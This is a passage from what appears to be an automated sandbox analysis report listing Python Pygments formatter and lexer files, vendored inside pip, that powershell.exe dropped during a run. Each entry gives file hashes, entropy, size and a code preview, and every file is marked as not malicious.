                              SHA1:4AD1DCB7E08115FBA6843A9DA4CBB30FACB049EC
                              SHA-256:A12659ADDE8AFF36BE468564EF0B7BCC646BDDB9C30580B855092D16AB0130C4
                              SHA-512:2FA9CDBE04D91CCEFC4733E6CBC86E31C73493FB33399F56AAF4FD88A1C3E7A27A4B39F0B3111093D7147E2C965E5F110297C49F721027B45AF1283484FDBDB2
                              Malicious:false
                              Preview:........=.Cf..........................@.....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.g.Z...G.d...d.e.........Z.y.).z.. pygments.formatters.rtf. ~~~~~~~~~~~~~~~~~~~~~~~.. A formatter that generates RTF files... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...get_int_opt..surrogatepair..RtfFormatterc.....................8.....e.Z.d.Z.d.Z.d.Z.d.g.Z.d.g.Z.d...Z.d...Z.d...Z.d...Z.y.).r....a..... Format tokens as RTF markup. This formatter automatically outputs full RTF. documents with color information and other useful stuff. Perfect for Copy and. Paste into Microsoft(R) Word(R) documents... Please note that ``encoding`` and ``outencoding`` options are ignored.. The RTF format is ASCII natively, but handles unicode characters correctly. thanks to escape sequences... .. versionadded:: 0.6.. Additional options accepted:.. `style`. The style to use, can be a string or a S
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9077
                              Entropy (8bit):5.5717018035463255
                              Encrypted:false
                              SSDEEP:192:nLpHUoqWLfpqnpjzjgaoFDXtjrEDThEHOSa37s4jnTAVOvc:nlHUoqQpejzxmt3+EH2Y4eF
                              MD5:652CFB04B4DF7A3B0D585FA2C728C863
                              SHA1:A2F47A1308BBF8F4A6D66CA6F15EAABBBE1A3BDC
                              SHA-256:CCD6242EFBE7D6EB8092383B5C2BAC568A355C0E2899271A76F4DDE2FE130CE2
                              SHA-512:405584866905EBE3232AFF4026CEB8483A2ACDFC205667725FAD17F8913B780C3FD309BB82269095AE379500E222E7CE2E3B1C13D5967320EEEF002D798E51A2
                              Malicious:false
                              Preview:........=.Cf..........................V.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.g.Z.d...Z.i.Z...G.d...d.e.........Z.y.).z.. pygments.formatters.svg. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for SVG output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...Comment)...get_bool_opt..get_int_opt..SvgFormatterc..........................|.j...................d.d.........j...................d.d.........j...................d.d.........j...................d.d.........j...................d.d.........S.).z<Escape &, <, > as well as single and double quotes for HTML...&z.&amp;..<z.&lt;..>z.&gt;.."z.&quot;..'z.&#39;)...replace)...texts.... .oC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/formatters/svg.py..escape_htmlr........sE.........<.<...W..%........V..$........V..$........X..&........W..%....&.....c.....................2.....e.Z.d.Z.d.Z.d.Z.d.g.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5840
                              Entropy (8bit):5.468930184126338
                              Encrypted:false
                              SSDEEP:96:VJHe+FajECwfjJClv1vGEQ0+t33biKBUV/Kr/9OZ0XLyvMfqimu:VJHhOEnNm1u35pBe/KrlOZ0+umu
                              MD5:9F71909228A923435DA89BF3E527F848
                              SHA1:FC63A0F64ADB53276DD417E99D208607C771548F
                              SHA-256:49D461406A85D26DC2AB4B9B0AE7B11C59DFE485EA51388320DCB87C6AA6C15B
                              SHA-512:EE2762F4E4649D2F9C2B72BF39B3A90219170A136CA70BE3FD24D383AFE5BF79434AB9EF850DE441989D741BA10EC692A9425058476C0D50BD2B7D2F8E7960AB
                              Malicious:false
                              Preview:........=.CfB..............................d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.i.e.d...e.d...e.d...e.j&..................d...e.d...e.j(..................d...e.j*..................d...e.j,..................d...e.j...................d...e.j0..................d...e.j2..................d...e.j4..................d...e.j6..................d...e.j8..................d...e.j:..................d...e.j<..................d...e.j>..................d...e.d.e.d.e.j@..................d.e.jB..................d.e.jD..................d.e.jF..................d.e.jH..................d.e.j...................d.e.d.i...Z%..G.d...d.e.........Z&y.).z.. pygments.formatters.terminal. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for terminal output with ANSI sequences... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...Keyword..Name..Comment..String..Error..Number..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):15168
                              Entropy (8bit):5.139387807731162
                              Encrypted:false
                              SSDEEP:384:cIOtlZXjDwBUBE5MrL0JKRVMX0BK2gq/w3:c5lZXj0BUGy0JKTMEBU4w3
                              MD5:AE3FDE27792B8C9DE6F84555A7AE42ED
                              SHA1:9BC44F51EC97579D0DB4A890D1F0FFFB602226B0
                              SHA-256:89C1AC6F188E0D75F37967E7B6275036EAC1445EEA8567ACF19E0BED2037800F
                              SHA-512:2CE80CC8B1F2A295E7C496389A7D2A58F788BDA480FCE3F52FDD423951B1C7F0138E9E02AF1D689BB7AA70BFBC492BA5FBC3572ECB0A78890C74E6712AB45A61
                              Malicious:false
                              Preview:........=.Cf.-........................t.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).a..... pygments.formatters.terminal256. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for 256-color terminal output with ANSI sequences... RGB-to-XTERM color conversion routines adapted from xterm256-conv. tool (http://frexx.de/xterm-256-notes/data/xterm256-conv2.tar.bz2). by Wolfgang Frisch... Formatter version 1... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...codes)...ansicolors..Terminal256Formatter..TerminalTrueColorFormatterc.....................,.....e.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...EscapeSequenceNc.....................J.....|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........y...N)...fg..bg..bold..underline..italic)...selfr....r....r....r....r....s.... .wC:\Users\boadi\AppData\L
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with very long lines (341)
                              Category:dropped
                              Size (bytes):4176
                              Entropy (8bit):4.849249007004006
                              Encrypted:false
                              SSDEEP:96:aVN0VVz+V6ZVLVbsEbVxVnAwaVH/VRncVKgVLafVkVYlssVd16zLVz8XXVsZ+Vgl:aO0mBFbvJCtzcrof6tsbYLSX0+ETx
                              MD5:75B034B791DB82C44433D5F0E25287A8
                              SHA1:70C2241423F14E151908D1E41ED0F70154F1858B
                              SHA-256:D42C37EC5B9094D69C9F144A9AD94F5F89F22E85FDFEDB64A39670B1C354659E
                              SHA-512:07ACFFC0C0FDFB6C2E14FBC7CEECD127EF14FF64955E729C5DAB7CADBCB1640207094413B59DF9620BDDDF89692FDBE5D3E031B6DB5F68107C0FD564B7A7C9CF
                              Malicious:false
                              Preview:# Automatically generated by scripts/gen_mapfiles.py..# DO NOT EDIT BY HAND; run `tox -e mapfiles` instead...FORMATTERS = {. 'BBCodeFormatter': ('pygments.formatters.bbcode', 'BBCode', ('bbcode', 'bb'), (), 'Format tokens with BBcodes. These formatting codes are used by many bulletin boards, so you can highlight your sourcecode with pygments before posting it there.'),. 'BmpImageFormatter': ('pygments.formatters.img', 'img_bmp', ('bmp', 'bitmap'), ('*.bmp',), 'Create a bitmap image from source code. This uses the Python Imaging Library to generate a pixmap from the source code.'),. 'GifImageFormatter': ('pygments.formatters.img', 'img_gif', ('gif',), ('*.gif',), 'Create a GIF image from source code. This uses the Python Imaging Library to generate a pixmap from the source code.'),. 'GroffFormatter': ('pygments.formatters.groff', 'groff', ('groff', 'troff', 'roff'), (), 'Format tokens with groff escapes to change their color and font style.'),. 'HtmlFormatter': ('pygments
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3314
                              Entropy (8bit):4.362666351747487
                              Encrypted:false
                              SSDEEP:48:YhGEoEbqI2SlHv7obkmjkeBWKoxGPfabS2dlum1HxWRFRi7LH+W6fV6HgW6f1l:YhFDoSRvak0bBG8nErx1gR+eWy6AWyl
                              MD5:4350BFE3B4B875BAC9B50B13F0A4E028
                              SHA1:A3D39FE035B11FE1A67BDFB935A8106150D29267
                              SHA-256:AF56FBC33593268B800C32E1F99D758918B8890C43D09289D6A1E5EA6398C6C0
                              SHA-512:CB6E19FEFEFF30C68D2FA7B05ED8F9BDF4658815ADC0E436E7C6B8BBAF9781DDCF9CA30BBBC33BDF48C17B6BE9B867B5ACEE3AEA5877EA739EEE88107C28E77E
                              Malicious:false
                              Preview:""". pygments.formatters.bbcode. ~~~~~~~~~~~~~~~~~~~~~~~~~~.. BBcode formatter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""...from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.util import get_bool_opt..__all__ = ['BBCodeFormatter']...class BBCodeFormatter(Formatter):. """. Format tokens with BBcodes. These formatting codes are used by many. bulletin boards, so you can highlight your sourcecode with pygments before. posting it there... This formatter has no support for background colors and borders, as there. are no common BBcode tags for that... Some board systems (e.g. phpBB) don't support colors in their [code] tag,. so you can't use the highlighting together with that tag.. Text in a [code] tag usually is shown with a monospace font (which this. formatter can do with the ``monofont`` option) and no spaces (which you. need for indentation)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5094
                              Entropy (8bit):4.254468602206663
                              Encrypted:false
                              SSDEEP:96:YhHiDbbB18RnWEQUiGszU9r/75XpNS6nbeN5EQz7oFLb1D6:lB1InxiGL9rxpNSzpz7opxD6
                              MD5:1EF0AC9570D12DBA0DEA78E067D93510
                              SHA1:BA7EBFF6BEF1B782BBAC83582552213B1C815E48
                              SHA-256:C72F197F7B573A8E8C5AB5E1EF23C65B1DE5544920FC3858E02C66B036F4215A
                              SHA-512:0CB5A9CF1D2442DD3F9BAB521454256383B99C63637E14F6B1FE31ACAC21BD7B16C3A66E3A88926FB103B540B854F54C70E1BED85605CEC81F0F3FFBCFC2BE2A
                              Malicious:false
                              Preview:""". pygments.formatters.groff. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for groff output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import math.from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.util import get_bool_opt, get_int_opt..__all__ = ['GroffFormatter']...class GroffFormatter(Formatter):. """. Format tokens with groff escapes to change their color and font style... .. versionadded:: 2.11.. Additional options accepted:.. `style`. The style to use, can be a string or a Style subclass (default:. ``'default'``)... `monospaced`. If set to true, monospace font will be used (default: ``true``)... `linenos`. If set to true, print the line numbers (default: ``false``)... `wrap`. Wrap lines to the specified number of characters. Disabled if set to 0. (default: ``0``).. """.. name = 'groff'. aliases =
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):35610
                              Entropy (8bit):4.3963797496228
                              Encrypted:false
                              SSDEEP:768:VD05FhEEBGxIFiME72GTcnHS2bQt08aYUcfZHDwwMLF1AM0zxYP:Vwhp0Iiz2NnHSF08pBjEZEi
                              MD5:ABE92D7FFA4F592BA33C4B980A8FAC86
                              SHA1:CA4496D1DF41B8AA27158C66E63F640AB511D654
                              SHA-256:3C8CC0CA294DA9A4F34923F6B250C6D950CB137A8D8A85B2DAB82D492A2F8AE2
                              SHA-512:DD0BE30C9AAE21529F79E0B7815F53F55432537A056E0BF14BE77638C8F013B14957DD83C5B83E09459E24F12F5E2484CEB98F170D85D40FE2168F55094FEA59
                              Malicious:false
                              Preview:""". pygments.formatters.html. ~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for HTML output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import functools.import os.import sys.import os.path.from io import StringIO..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.token import Token, Text, STANDARD_TYPES.from pip._vendor.pygments.util import get_bool_opt, get_int_opt, get_list_opt..try:. import ctags.except ImportError:. ctags = None..__all__ = ['HtmlFormatter']..._escape_html_table = {. ord('&'): '&amp;',. ord('<'): '&lt;',. ord('>'): '&gt;',. ord('"'): '&quot;',. ord("'"): '&#39;',.}...def escape_html(text, table=_escape_html_table):. """Escape &, <, > as well as single and double quotes for HTML.""". return text.translate(table)...def webify(color):. if color.startswith('calc') or color.startswith('var'):. return color. else:. retu
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):21938
                              Entropy (8bit):4.413503161579316
                              Encrypted:false
                              SSDEEP:384:vIljThi956+foyyYhVeYfKaC9A/TSpdTVZbX:vIl/65ObYhg4TaTZbX
                              MD5:DF7E2179349901F00DDBEBF6F9D9DAFE
                              SHA1:D5FBA1A1563D08268E0B6B6032F9EAF231BF534B
                              SHA-256:5CA5E6836FD738DAD1E26B6ADA37C453C5C2B28967DD54864F0F94622128932B
                              SHA-512:402341810CEDA6849C380ED9CD50B84DEAD9978E1660AF4FBC8FA872B629613E117161F93DA064B797C59468C960F1BCCCC0BCFE7B0487672DBCF0E6FAA8593A
                              Malicious:false
                              Preview:""". pygments.formatters.img. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for Pixmap output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import os.import sys..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.util import get_bool_opt, get_int_opt, get_list_opt, \. get_choice_opt..import subprocess..# Import this carefully.try:. from PIL import Image, ImageDraw, ImageFont. pil_available = True.except ImportError:. pil_available = False..try:. import _winreg.except ImportError:. try:. import winreg as _winreg. except ImportError:. _winreg = None..__all__ = ['ImageFormatter', 'GifImageFormatter', 'JpgImageFormatter',. 'BmpImageFormatter']...# For some unknown reason every font calls it something different.STYLES = {. 'NORMAL': ['', 'Roman', 'Book', 'Normal', 'Regular', 'Medium'],. 'ITALIC': ['Oblique', 'Italic'],. 'BOLD':
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4981
                              Entropy (8bit):4.605688600636415
                              Encrypted:false
                              SSDEEP:96:YvjDbE7kDiPMairm3UhwJ7T5TccSCuyoCbnR2NtotF/mvy50y+xvGv2Edcrjx7kT:ixRmcXFWRcCrmvy50y+xuve573jfvo
                              MD5:C3510AB1404908F9C672053BE75354B0
                              SHA1:5B8318E11DA76CA37C2CB38946024C206A0637DA
                              SHA-256:129FA6F23777BE814EE85BF9EDC506166CFA25503AEC8120CA204EC2FD0DE1AD
                              SHA-512:28FFD4CA8F93ED7C002CF5DF21C6F8E968963892B0F8B948FB2ABEB55FD195FD73EC827BA76B21984DF994E8A2643E745DCDADF04EC5BC40D357D31B79BAA038
                              Malicious:false
                              Preview:""". pygments.formatters.irc. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for IRC output.. :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.token import Keyword, Name, Comment, String, Error, \. Number, Operator, Generic, Token, Whitespace.from pip._vendor.pygments.util import get_choice_opt...__all__ = ['IRCFormatter']...#: Map token types to a tuple of color values for light and dark.#: backgrounds..IRC_COLORS = {. Token: ('', ''),.. Whitespace: ('gray', 'brightblack'),. Comment: ('gray', 'brightblack'),. Comment.Preproc: ('cyan', 'brightcyan'),. Keyword: ('blue', 'brightblue'),. Keyword.Type: ('cyan', 'brightcyan'),. Operator.Word: ('magenta', 'brightcyan'),. Name.Builtin: ('cyan', 'brightcyan'),. Nam
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):19351
                              Entropy (8bit):4.494553765676379
                              Encrypted:false
                              SSDEEP:384:XgU1RQ98hoPWa4YFjB/ltd0kgE/5+sFElmKJ+uW5zzJ:XRQ98hJa4GBNvV/5+sqYKArt
                              MD5:E5EE23B49F2EB7EC4FF2D668A515EBBA
                              SHA1:9C53C6B35022251DC6EDDA5D00CF905953F789C0
                              SHA-256:146CC9F98A924C4F33FEFA163DDCEF2D8E53ABC8C4FF28231A333A757649F3E9
                              SHA-512:A68EFCCBE00F2BF93E0735939ABBAB0934F46AB7ACB0D1E757FFB3A53556DC94E0BCDC23BAE3E7986225C1AD6C8169D0574A01FEB37CCE7ABEF6971FD20AE67A
                              Malicious:false
                              Preview:""". pygments.formatters.latex. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for LaTeX fancyvrb output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from io import StringIO..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.lexer import Lexer, do_insertions.from pip._vendor.pygments.token import Token, STANDARD_TYPES.from pip._vendor.pygments.util import get_bool_opt, get_int_opt...__all__ = ['LatexFormatter']...def escape_tex(text, commandprefix):. return text.replace('\\', '\x00'). \. replace('{', '\x01'). \. replace('}', '\x02'). \. replace('\x00', r'\%sZbs{}' % commandprefix). \. replace('\x01', r'\%sZob{}' % commandprefix). \. replace('\x02', r'\%sZcb{}' % commandprefix). \. replace('^', r'\%sZca{}' % commandprefix). \. replace('_', r'\%sZus{}' % commandprefix). \.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5073
                              Entropy (8bit):4.485076089343685
                              Encrypted:false
                              SSDEEP:96:YcjDxbl10ZQy43M14Q4EJmBa8D+wPjzwPS3YD02iZ9Eeo74EWH1N4u:Hv0j43M14QfynyS3YD0HNoPWn
                              MD5:8FB3EFA99D9F5AF4B315C815EE8AF643
                              SHA1:04C749953F070666BD0A2F22C93B8A95522D9111
                              SHA-256:80FC6493905D0335930A06C41E0D65A4B8BED45E993E1E40FDAA2D80B5C79F38
                              SHA-512:00674E7D34C4367EC586C92A136202968CAEB7E7115C81F588AF6A087340131807402250B6D8145F33C933ECC8A66181F9A7E79000461A76697C4604151EA513
                              Malicious:false
                              Preview:""". pygments.formatters.other. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Other formatters: NullFormatter, RawTokenFormatter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.util import get_choice_opt.from pip._vendor.pygments.token import Token.from pip._vendor.pygments.console import colorize..__all__ = ['NullFormatter', 'RawTokenFormatter', 'TestcaseFormatter']...class NullFormatter(Formatter):. """. Output the text unchanged without any formatting.. """. name = 'Text only'. aliases = ['text', 'null']. filenames = ['*.txt'].. def format(self, tokensource, outfile):. enc = self.encoding. for ttype, value in tokensource:. if enc:. outfile.write(value.encode(enc)). else:. outfile.write(value)...class RawTokenFormatter(Formatter):. r""". Format tokens
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):2212
                              Entropy (8bit):4.3980651718244275
                              Encrypted:false
                              SSDEEP:48:Y8WGUZDeRICvBlcYdfabNyZ6dWNFRi7vQWVbRRKWVbxfJv:YdjFeaCvfcqENWzNRWV2WVFh
                              MD5:D59D5EBAF8BC5790E74F867760E9FFC8
                              SHA1:9956F2778A8B2C934849F005E7E752E22B524FCC
                              SHA-256:E8B2A741CF32878F5FF34D9B174B0FBDBCDC938422BCC62AAA85C03DA60FF2E5
                              SHA-512:43B95EA6DAA2BAFDDC66AE91891B4016396CE418A400B15285639D7FC792AE5BFB86F31552D6EC28D3B4B067893FAA5C413CE597E44DD63DB01176E4965C6774
                              Malicious:false
                              Preview:""". pygments.formatters.pangomarkup. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for Pango markup output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter...__all__ = ['PangoMarkupFormatter']..._escape_table = {. ord('&'): '&amp;',. ord('<'): '&lt;',.}...def escape_special_chars(text, table=_escape_table):. """Escape & and < for Pango Markup.""". return text.translate(table)...class PangoMarkupFormatter(Formatter):. """. Format tokens as Pango Markup code. It can then be rendered to an SVG... .. versionadded:: 2.9. """.. name = 'Pango Markup'. aliases = ['pango', 'pangomarkup']. filenames = [].. def __init__(self, **options):. Formatter.__init__(self, **options).. self.styles = {}.. for token, style in self.style:. start = ''. end = ''. if style['color']:.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5014
                              Entropy (8bit):4.3942932168278555
                              Encrypted:false
                              SSDEEP:96:YFyjDdsO7DspbB2oleCa6jbaoMIq2PL822ov30fW2c8u6:8O7IBB2o2YmQqWL82zEr
                              MD5:B87C660D8F39001B1FB3C6D3B2C53524
                              SHA1:E63A50CBCCCF45CE2E9AFFDA76CC00F670D155F8
                              SHA-256:680D2FFE9B16E8A648DCDD7C4CA0E27F178BEA6705F040D770F5C3588E2F8554
                              SHA-512:4052B721AC723A9AA24275E906FBB12183E24DF55F240C189D58E2A34B2158C2D30A96A514A2F97D9AB205CCBD745ED3F5406E2A8F3D4819A327342D95EFCBEE
                              Malicious:false
                              Preview:""". pygments.formatters.rtf. ~~~~~~~~~~~~~~~~~~~~~~~.. A formatter that generates RTF files... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.util import get_int_opt, surrogatepair...__all__ = ['RtfFormatter']...class RtfFormatter(Formatter):. """. Format tokens as RTF markup. This formatter automatically outputs full RTF. documents with color information and other useful stuff. Perfect for Copy and. Paste into Microsoft(R) Word(R) documents... Please note that ``encoding`` and ``outencoding`` options are ignored.. The RTF format is ASCII natively, but handles unicode characters correctly. thanks to escape sequences... .. versionadded:: 0.6.. Additional options accepted:.. `style`. The style to use, can be a string or a Style subclass (default:. ``'default'``)... `fontface`.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):7335
                              Entropy (8bit):4.583952729263398
                              Encrypted:false
                              SSDEEP:192:ePWE6uUoqWLfpqnpjzjxK2jhE8kYqc3eTU+:enUoqQpejzNKgE8fZkR
                              MD5:A4CB418CECBD1B90E53469555FA3F5C5
                              SHA1:0FB3AC6EF25F83DB9877B5BB296C16149F01BC5F
                              SHA-256:75038D5B2A5BCDFBF31820ED769DCCFCD25AC12709BCCD838876F1D64FB0C3B8
                              SHA-512:B2F34BCA13E79B2E918E236B202EA8B360C409114454CBBF57C5AA65F93DF85E0DCA93E9CE47A26B9805C5CB6780CEF85748769EA9AC8E496C6FE5DA5979C6DB
                              Malicious:false
                              Preview:""". pygments.formatters.svg. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for SVG output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.token import Comment.from pip._vendor.pygments.util import get_bool_opt, get_int_opt..__all__ = ['SvgFormatter']...def escape_html(text):. """Escape &, <, > as well as single and double quotes for HTML.""". return text.replace('&', '&amp;'). \. replace('<', '&lt;'). \. replace('>', '&gt;'). \. replace('"', '&quot;'). \. replace("'", '&#39;')...class2style = {}..class SvgFormatter(Formatter):. """. Format tokens as an SVG graphics file. This formatter is still experimental.. Each line of code is a ``<text>`` element with explicit ``x`` and ``y``. coordinates containing ``<tspan>`` elements with the individual token sty
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4674
                              Entropy (8bit):4.525673767034789
                              Encrypted:false
                              SSDEEP:96:Y+jDbE78oDCPMECairm3UhwJ7T5TccSCw/dev1vGESZREaRq0vlCDDdGXhcz7cF2:J2GwmcXT41uxa0vM/z7cND8r
                              MD5:553F6C2A6AC4B0BF992FE22D97475324
                              SHA1:AB7A1B9467ADF12A34D845776267A048D375ABAB
                              SHA-256:146FABA6346916636988607837322E72FC6AEAC4085C1DC7393A3699E4CAB6B5
                              SHA-512:DD66F018855E5DCC7297EE5AD153917AB1AB1466A1B98346F3018CA109555C1837CA7EC3A1908C782C580EC72C4B7ED6F855DBBB5D8DFBDA18D75CC8F9BD615A
                              Malicious:false
                              Preview:""". pygments.formatters.terminal. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for terminal output with ANSI sequences... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.token import Keyword, Name, Comment, String, Error, \. Number, Operator, Generic, Token, Whitespace.from pip._vendor.pygments.console import ansiformat.from pip._vendor.pygments.util import get_choice_opt...__all__ = ['TerminalFormatter']...#: Map token types to a tuple of color values for light and dark.#: backgrounds..TERMINAL_COLORS = {. Token: ('', ''),.. Whitespace: ('gray', 'brightblack'),. Comment: ('gray', 'brightblack'),. Comment.Preproc: ('cyan', 'brightcyan'),. Keyword: ('blue', 'brightblue'),. Keyword.Type: ('cyan', 'brightcyan'),. Operator.Word:
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):11753
                              Entropy (8bit):4.44812529232476
                              Encrypted:false
                              SSDEEP:192:NBt0HK4hMdr0JqwBjc2wfoUlh6d/09pJLDSz79UaSUzaUz30BXeqJL/:54K0MPwBjcEdc94x0BXeS
                              MD5:C4A9E20559C4424271DC1EE03FC4411E
                              SHA1:9758CA0D25790D178FE0B9CFC3F8CA012D46841E
                              SHA-256:D77489DC3E6915DA99F7344E13A1DB5A7043C07BCE184F0696C9AA1A1A6B469E
                              SHA-512:E23C22338A0014541CA759E3717C957A2DF6F98F51DD6252E48FFEC181E4E27C276CD96951CF606D0D1C3A41D85A5974B5AE411BB7270C6E4D3D7ABBF69C0B20
                              Malicious:false
                              Preview:""". pygments.formatters.terminal256. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for 256-color terminal output with ANSI sequences... RGB-to-XTERM color conversion routines adapted from xterm256-conv. tool (http://frexx.de/xterm-256-notes/data/xterm256-conv2.tar.bz2). by Wolfgang Frisch... Formatter version 1... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..# TODO:.# - Options to map style's bold/underline/italic/border attributes.# to some ANSI attrbutes (something like 'italic=underline').# - An option to output "style RGB to xterm RGB/index" conversion table.# - An option to indicate that we are running in "reverse background".# xterm. This means that default colors are white-on-black, not.# black-on-while, so colors like "white background" need to be converted.# to "white background, black foreground", etc.....from pip._vendor.pygments.formatter import Formatter.from pip._v
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):34618
                              Entropy (8bit):4.190746563497643
                              Encrypted:false
                              SSDEEP:768:s3Nf24IDmMl4cZtM65YqtXwXNBZwahT+66o:sdf24M7RZtzYqwGahT+6l
                              MD5:682751F490E0EE1C872A7F13B387CBCB
                              SHA1:A7630EAC5CAB404716A0ABBEBC7CCBA1985AF756
                              SHA-256:D81A6A2E54F6131BCE3A2EEF9E32B99C1E05A7E9B9DA57623DA5CCA31E6EC2E8
                              SHA-512:60B9EEAC99107794B083697693C691E0AA3B5AD58873BCB29AD6E874C0CF03BADF87D65FEDE82B9D2F938B45152AAB231DDAFC7340C0760697A6EEAD0CC85D4E
                              Malicious:false
                              Preview:""". pygments.lexer. ~~~~~~~~~~~~~~.. Base lexer classes... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.import sys.import time..from pip._vendor.pygments.filter import apply_filters, Filter.from pip._vendor.pygments.filters import get_filter_by_name.from pip._vendor.pygments.token import Error, Text, Other, Whitespace, _TokenType.from pip._vendor.pygments.util import get_bool_opt, get_int_opt, get_list_opt, \. make_analysator, Future, guess_decode.from pip._vendor.pygments.regexopt import regex_opt..__all__ = ['Lexer', 'RegexLexer', 'ExtendedRegexLexer', 'DelegatingLexer',. 'LexerContext', 'include', 'inherit', 'bygroups', 'using', 'this',. 'default', 'words', 'line_re']..line_re = re.compile('.*?\n').._encoding_map = [(b'\xef\xbb\xbf', 'utf-8'),. (b'\xff\xfe\0\0', 'utf-32'),. (b'\0\0\xfe\xff', 'utf-32be'),. (b'\xff\xfe', '
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):12130
                              Entropy (8bit):4.5541396999823425
                              Encrypted:false
